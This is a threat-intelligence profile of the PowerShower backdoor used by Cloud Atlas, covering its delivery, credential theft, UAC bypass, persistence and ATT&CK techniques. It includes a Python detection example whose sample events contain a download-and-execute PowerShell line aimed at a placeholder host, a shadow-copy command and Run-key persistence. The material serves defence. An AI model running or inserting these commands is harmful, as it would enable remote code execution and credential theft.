PowerShower
PowerShower is a PowerShell-based backdoor used by the Cloud Atlas APT group. It has been described as a second-stage backdoor and reconnaissance tool deployed alongside VBCloud in Cloud Atlas intrusion chains. Recent reporting ties it to phishing campaigns targeting primarily government agencies, diplomatic organizations, and other entities in Russia and Belarus, where ZIP archives containing malicious LNK files launched external PowerShell scripts that established persistence, opened decoy PDFs, removed infection traces, and deployed PowerShower and VBCloud. Earlier reporting also states Cloud Atlas previously dropped PowerShower directly after exploiting Microsoft Equation Editor vulnerabilities CVE-2017-11882 and CVE-2018-0802.
PowerShower is primarily used for network reconnaissance and further propagation within victim environments. Reported capabilities include collecting information about running processes, administrator groups, domain controllers, and the current user; downloading and executing additional PowerShell scripts from command-and-control infrastructure; saving and executing VBScript; and conducting Kerberoasting attacks. It can encode C2 communications with Base64. It has also been associated with a PowerShell document-stealer module that uses 7-Zip to compress and exfiltrate .txt, .pdf, .xls, and .doc files smaller than 5 MB that were modified within the previous two days, sending the data over its C2 channel.
For stealth and cleanup, PowerShower has been reported to add a registry key so future powershell.exe instances spawn off-screen by default, remove registry entries left by the dropper process, and delete files created during the dropper process. In Cloud Atlas operations, PowerShower has been observed persisted as C:\Users\[username]\Pictures\googleearth.ps1. Associated infrastructure and activity in the same campaigns included attacker-controlled domains hosting PowerShell payloads and broader Cloud Atlas use of reverse SSH tunnels, RevSocks, and Tor-backed access, though those mechanisms are part of the surrounding intrusion set rather than confirmed intrinsic PowerShower functionality.
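The following is an added example and is not code from this page, from Mallory, or from the vendor reports it summarises. It turns the behaviours described above (a shortcut launching PowerShell that pulls a script from an external server, a .ps1 persisted under a user's Pictures folder, a Run/RunOnce value pointing at PowerShell, and SAM/SECURITY copies staged as PDFs after a shadow copy is created) into detection heuristics run over a handful of constructed endpoint events shaped loosely like Sysmon process, file and registry telemetry. The event field names, every sample value, and the assumption that the shadow copy is created with a vssadmin invocation are all assumptions made for this example; the page does not say how the copy is created.

```python
"""Heuristics for the PowerShower delivery, persistence and hive-staging
artefacts described above, applied to constructed endpoint telemetry.
Added example; not code from the page, Mallory, or any vendor report."""
import re

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")

REMOTE_URL = re.compile(r"https?://", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
PICTURES_PS1 = re.compile(r"\\Users\\[^\\]+\\Pictures\\[^\\]+\.ps1$", re.I)
PUBLIC_DOCS_PDF = re.compile(r"\\Users\\Public\\Documents\\[^\\]+\.pdf$", re.I)
# The page says the credential-theft script creates a shadow copy of C:\ but
# not how; matching a vssadmin command line is an assumption of this example.
SHADOW_CREATE = re.compile(r"vssadmin(\.exe)?\s+create\s+shadow", re.I)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry; every value here is invented for the example.
SAMPLE_EVENTS = [
    {"type": "process", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
            ".DownloadString('http://cdn.example.invalid/s.ps1')\""},
    {"type": "file", "image": PS, "path": r"C:\Users\alice\Pictures\googleearth.ps1"},
    {"type": "registry", "image": PS,
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"powershell.exe -w hidden -f C:\Users\alice\Pictures\googleearth.ps1"},
    {"type": "process", "image": r"C:\Windows\System32\vssadmin.exe", "parent": PS,
     "cmd": "vssadmin.exe create shadow /for=C:"},
    {"type": "file", "image": PS, "path": r"C:\Users\Public\Documents\sam.pdf"},
    # Benign: a management agent running a local script, no external URL.
    {"type": "process", "image": PS, "parent": r"C:\Program Files\Corp\Agent.exe",
     "cmd": "powershell.exe -File C:\\ProgramData\\Corp\\inventory.ps1"},
    # Benign: an office application saving a real PDF to the public folder.
    {"type": "file", "image": r"C:\Program Files\Office\winword.exe",
     "path": r"C:\Users\Public\Documents\quarterly.pdf"},
]


def basename(path):
    """Last path component, lower-cased, for image/parent comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def is_script_host(ev):
    return basename(ev.get("image", "")) in SCRIPT_HOSTS


def lnk_style_remote_powershell(ev):
    """explorer.exe (which runs a double-clicked LNK) spawning PowerShell
    whose command line fetches content from an external URL."""
    return (ev["type"] == "process"
            and basename(ev["image"]) in ("powershell.exe", "pwsh.exe")
            and basename(ev.get("parent", "")) == "explorer.exe"
            and bool(REMOTE_URL.search(ev.get("cmd", ""))))


def ps1_written_to_user_pictures(ev):
    """A .ps1 dropped into a user's Pictures folder, the reported
    persistence location C:\\Users\\<user>\\Pictures\\googleearth.ps1."""
    return ev["type"] == "file" and bool(PICTURES_PS1.search(ev.get("path", "")))


def run_key_points_at_powershell(ev):
    """Run/RunOnce value whose data launches PowerShell or a .ps1 file."""
    data = ev.get("data", "").lower()
    return (ev["type"] == "registry"
            and bool(RUN_KEY.search(ev.get("key", "")))
            and ("powershell" in data or ".ps1" in data))


def hunt(events):
    """Apply the stateless rules to every event, plus one stateful rule:
    after a shadow copy creation, .pdf files written by a script host into
    C:\\Users\\Public\\Documents (the reported disguise for copied SAM and
    SECURITY hives) are flagged. Returns (rule_name, event_index) pairs."""
    hits = []
    shadow_seen = False
    for i, ev in enumerate(events):
        for rule in (lnk_style_remote_powershell, ps1_written_to_user_pictures,
                     run_key_points_at_powershell):
            if rule(ev):
                hits.append((rule.__name__, i))
        if ev["type"] == "process" and SHADOW_CREATE.search(ev.get("cmd", "")):
            shadow_seen = True
            hits.append(("shadow_copy_created", i))
        elif (shadow_seen and ev["type"] == "file" and is_script_host(ev)
              and PUBLIC_DOCS_PDF.search(ev.get("path", ""))):
            hits.append(("pdf_staged_after_shadow_copy", i))
    return hits


if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        print(f"{name}: event {idx}")
```

`hunt(SAMPLE_EVENTS)` flags the first five events and leaves the two benign ones alone: the agent-launched PowerShell has no external URL and no explorer.exe parent, and the Word document lands in the public folder but is not written by a script host. The stateful rule is deliberately ordered, so a PDF written before any shadow copy creation is not reported; in a real pipeline the same logic would key on host and session rather than on position in one list.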
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
When a victim opens the shortcut, it quietly runs a PowerShell script pulled from an external server. That script sets up persistence, downloads a decoy PDF to distract the user, removes infection traces, and deploys payloads including a backdoor called VBCloud and a reconnaissance tool called PowerShower.
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
1 technique
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
Persistence
2 techniques
The content repeatedly describes threat actors and malware modifying, creating, deleting, or storing data in Windows Registry keys and values for persistence, configuration storage, defense evasion, credential access, privilege escalation, and execution.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
Privilege Escalation
2 techniques
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.
To obtain elevated privileges, the script uses a UAC bypass technique via fodhelper.exe ... which allows PowerShell to be launched with administrator rights without a direct prompt to the user.
Stealth
3 techniques
Copies the SAM ... and SECURITY system files from this shadow copy to C:\Users\Public\Documents\, disguising them as PDF files.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
Defense Impairment
1 technique
Credential Access
3 techniques
PowerShower downloads an additional script for stealing credentials ... copies the SAM ... and SECURITY system files from the shadow copy
Creates a Volume Shadow Copy of the C:\ drive. Copies the SAM ... and SECURITY system files from this shadow copy
PowerShower can perform the following tasks ... carrying out Kerberoasting attacks (theft of password hashes of Active Directory accounts).
Discovery
7 techniques
The content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
That script sets up persistence, downloads a decoy PDF to distract the user, removes infection traces, and deploys payloads including a backdoor called VBCloud and a reconnaissance tool called PowerShower.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
PowerShower can perform the following tasks: Collect information about running processes, administrator groups, and domain controllers.
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
PowerShower can perform the following tasks: collecting information about ... domain controllers.
Collection
1 technique
Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP... Tomiris can upload files matching a hardcoded set of extensions... PowerShower packed and exfiltrated .txt, .pdf, .xls or .doc files smaller than 5MB modified during the past two days.
Command and Control
4 techniques
This is the main module that connects to a C2 server to receive additional scripts or execute built-in commands.
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
When a victim opens the shortcut, it quietly runs a PowerShell script pulled from an external server.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
IOCs tracked for this family
24 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
30 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A reconnaissance tool used by Cloud Atlas during post-compromise activity, delivered alongside VBCloud.
Backdoor focused on network reconnaissance and lateral movement. It can collect information on running processes, administrator groups, and domain controllers, download and execute PowerShell scripts from C2, perform Kerberoasting, and load an additional credential-theft script that copies SAM and SECURITY hives using a shadow copy and uses fodhelper.exe for UAC bypass.
PowerShower is a backdoor used as a secondary payload by Cloud Atlas, capable of retrieving and executing additional payloads from a remote server.
PowerShower is a PowerShell-based backdoor that executes additional payloads retrieved from its C2 server, exfiltrates data, and can grab files from network shares. It is installed and launched by VBShower.